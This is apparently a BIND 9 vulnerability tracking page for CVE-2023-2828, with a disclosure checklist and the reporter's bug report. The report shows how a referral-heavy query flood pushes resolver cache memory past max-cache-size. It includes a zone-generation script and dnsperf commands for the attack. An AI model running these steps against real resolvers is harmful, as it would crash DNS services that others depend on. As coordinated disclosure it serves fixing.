[CVE-2023-2828] named's configured cache size limit can be significantly exceeded
Quick Links | |
---|---|
Incident Manager: | @michal |
Deputy Incident Manager: | @aram |
Public Disclosure Date: | 2023-06-21 |
CVSS Score: | 7.5 |
Security Advisory: | isc-private/printing-press!54 |
Mattermost Channel: | CVE-2023-2828: max-cache-size can be significantly exceeded |
Support Ticket: | N/A |
Release Checklist: | #4123 (closed) |
Post-mortem Etherpad: | postmortem-2023-06 |
Earlier Than T-5
-
🔗 (IM) Pick a Deputy Incident Manager -
🔗 (IM) Respond to the bug reporter -
🔗 (IM) Create an Etherpad for post-mortem -
🔗 (SwEng) Ensure there are no public merge requests which inadvertently disclose the issue -
🔗 (IM) Assign a CVE identifier -
🔗 (SwEng) Update this issue with the assigned CVE identifier and the CVSS score -
🔗 (SwEng) Determine the range of product versions affected (including the Subscription Edition) -
🔗 (SwEng) Determine whether workarounds for the problem exist -
🔗 (SwEng)If necessary, coordinate with other parties -
🔗 (Support) Prepare and send out "earliest" notifications -
🔗 (Support) Create a merge request for the Security Advisory and include all readily available information in it -
🔗 (SwEng) Prepare a private merge request containing a system test reproducing the problem -
🔗 (SwEng) Notify Support when a reproducer is ready -
🔗 (SwEng) Prepare a detailed explanation of the code flow triggering the problem -
🔗 (SwEng) Prepare a private merge request with the fix -
🔗 (SwEng) Ensure the merge request with the fix is reviewed and has no outstanding discussions -
🔗 (Support) Review the documentation changes introduced by the merge request with the fix -
🔗 (SwEng) Prepare backports of the merge request addressing the problem for all affected (and still maintained) branches of a given product -
🔗 (Support) Finish preparing the Security Advisory -
🔗 (QA) Create (or update) the private issue containing links to fixes & reproducers for all CVEs fixed in a given release cycle -
🔗 (QA) (BIND 9 only) Reserve a block ofCHANGES
placeholders once the complete set of vulnerabilities fixed in a given release cycle is determined -
🔗 (QA) Merge the CVE fixes in CVE identifier order -
🔗 (QA) Prepare a standalone patch for the last stable release of each affected (and still maintained) product branch -
🔗 (QA) Prepare ASN releases (as outlined in the Release Checklist)
At T-5
-
🔗 (Support) Send ASN to eligible customers -
🔗 (Support) (BIND 9 only) Send a pre-announcement email to the <em>bind-announce</em> mailing list to alert users that the upcoming release will include security fixes
At T-4
-
🔗 (Support) Verify that all ASN-eligible customers have received the notification email
At T-1
-
🔗 (Support) Verify that any new or reinstated customers have received the notification email -
🔗 (First IM) Send notifications to OS packagers
On the Day of Public Disclosure
-
🔗 (IM) Grant Support clearance to proceed with public release -
🔗 (Support) Publish the releases (as outlined in the release checklist) -
🔗 (Support) (BIND 9 only) Update vulnerability matrix in the Knowledge Base -
🔗 (Support) Bump Document Version for the Security Advisory and publish it in the Knowledge Base -
🔗 (First IM) Send notification emails to third parties -
🔗 (First IM) Advise MITRE about the disclosed CVEs -
🔗 (First IM) Merge the Security Advisory merge request -
🔗 (IM) Inform original reporter (if external) that the security disclosure process is complete -
🔗 (Support) Inform customers a fix has been released
After Public Disclosure
-
🔗 (First IM) Organize post-mortem meeting and make sure it happens -
🔗 (Support) Close support tickets -
🔗 (QA) Merge a regression test reproducing the bug into all affected (and still maintained) branches
Summary
This vulnerability results in high memory cache usage for a DNS resolver, even larger than the maximum cache size configured. This happens when the resolver gets around 20,000 requests in several minutes or hours. For example, with a 250 QPS rate, 1000MB RAM is used after 80 seconds when cache max size is configured to 32MB (the results example is attached to this message).
BIND version used
BIND 9.16.40 (Extended Support Version) id:113a865
Steps to reproduce
We reproduce NRDelegationAttack with some changes, for more details: https://www.usenix.org/system/files/sec23fall-prepub-309-afek.pdf
- set the maximum cache size to 32MB:
in named.conf.option (attached example:named.conf.options):
options {
...
max-cache-size 32m;
...
}
-
Run the resolver:
named -g -c /etc/named.conf
-
Run psrecord for testing the RAM usage of the resolver:
psrecord NAMED_PID --interval 1 --plot OUTPUT_FILE.png
-
Option a:
Request my domain (shoham-shani.online) up to 50,000 dns queries (my authoritative ip address is 74.234.116.29):
dig shoham{count}.shoham-shani.online. @resolver_ip (count is from 0 to 49,999)
(you can use dnsperf: dnsperf -d queries.txt -s resolver_ip -v -Q 250
, an example to queries.txt is attached: queries.txt
You can provide us with a test resolver that you want us to attack, and we will perform the attack from our client side at the time we will agree on.
- option b:
Create a zone file (example is attached) that has 1500 referrals per one request, you can use this script for that:
with open('zonfile.txt', 'w') as f:
for i in range(1, 50000):
for j in range(0, 1500):
print(f'shoham{i} 8600 IN NS attack{j}.auth{j}.shoham.store.',file=f)
shoham-shani.online_zonefile_example.txt
Create another zonefile that answers all shoham{i}.shoham.store. request: For example:
* IN A 127.0.0.1
shoham.store_zonefile_example_copy.txt Request 50,000 dns queries as I described in option a.
-
Take a dump of the cache and examine its size:
rndc dumpdb -cache
-
Stop the resolver service and download the OUTPUT_FILE.png image, examining RAM usage.
note: we checked the bug with 32MB, 64MB and 1GB max-cache-size and with rate of 1,5,10,13,100,250 QPS (all the results are attached)
For 1 QPS I got 440MB RAM used after 8,000 seconds for max-cache-size 32MB
For 5 QPS I got 840MB RAM used after 4,000 seconds for max-cache-size 32MB
For 10 QPS I got 840MB RAM used after 2,000 seconds for max-cache-size 32MB
For 100 QPS I got 840MB RAM used after 200 seconds for max-cache-size 32MB
For 250 QPS I got 1000MB RAM used after 80 seconds for max-cache-size 32MB
For 13 QPS I got 1550MB RAM used after 1150 seconds for max-cache-size 1000MB
What is the current bug behavior?
-
The cache size expands beyond the limit resulting in an increasing amount of memory being allocated. In addition, if there is no memory available on the machine, the resolver service will crash.
-
A free memory action is not performed for the referral list buffer, which results in an increase in memory allocation for buffers (dns_rdataslab_fromrdataset function in line 272 of the rdataslab.c file).
-
It seems the cache size calculation does not consider authoritative nameservers' refferal answers, although they are stored in the cache.
-
High and low watermarks are set incorrectly to 0, which means the resolver is unaware that the memory usage exceeds the maximum level and does not reduce it.
What is the expected correct behavior?
-
The cache size should be the maximum size we configured.
-
There should be a free memory action to the buffer (rawbuf in rdataslab.c file)
-
In order to calculate cache size, it is necessary to take into account referral list and perform a deletion when the cache exceeds the configured limit.
Relevant configuration files
configuration file:
named.conf.options zonefiles: shoham-shani.online_zonefile_example.txt shoham.store_zonefile_example copy.txt
Relevant logs and/or screenshots
Tests are attached
Possible fixes
- Free the buffer:
free_rawbuf:
isc_mem_put(mctx, rawbuf, buflen);
please add the following to this issue: Yehuda Afek, yehuda.afek@gmail.com /cc @afek Anat Bremler-Barr, anat.bremlerbarr@gmail.com /cc @anat_bremler_barr Yuval Shavitt, shavitt@eng.tau.ac.il